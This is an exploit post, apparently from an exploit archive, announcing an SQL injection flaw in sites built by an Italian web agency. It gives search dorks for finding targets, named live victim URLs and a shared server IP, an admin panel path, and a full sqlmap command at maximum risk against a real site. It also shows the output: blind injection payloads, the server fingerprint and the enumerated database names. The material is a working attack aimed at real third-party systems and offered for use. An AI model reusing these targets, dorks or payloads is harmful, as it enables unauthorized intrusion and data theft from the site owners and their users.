# Exploit Title:alfacommunication.it SQL Injection vulnerability
# Date:29/11/2019
# Dork: inurl:detail.php?id= site:.it
        inurl:5ad.php?id= site:.it 
        inurl:single-news.php?id= site:.it
        inurl:caseinterno.php?id= site.it

# Exploit Author:H9xHacker
# Tested on:Linux


Reverse check bing.com

ip:54.76.134.14 .php?id= (There are 55 domains hosted on this server.)

# Demo
ediliziafiorentina.it/detail.php?id=19
old.faraone.it/5ad.php?id=319
intesagdi.it/0a-newsdetail.php?id=405

# Admin control panel path

site.it/cms/

# Poc:

sqlmap --level=5 --risk=3 --timeout=10 --threads=10 --random-agent -u 'http://old.faraone.it/5ad.php?id=319' --no-cast --batch --dbs

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=319 AND 7712=7712

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=319 AND (SELECT 9560 FROM (SELECT(SLEEP(5)))ORoc)
---
web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)
web application technology: Apache 2.2.22, PHP
back-end DBMS: MySQL >= 5.0.12
available databases [2]:
[*] `cms-faraone`
[*] information_schema
------------------------

video:https://www.youtube.com/watch?v=EEvMO-jyDPE


Greets:To All My Friends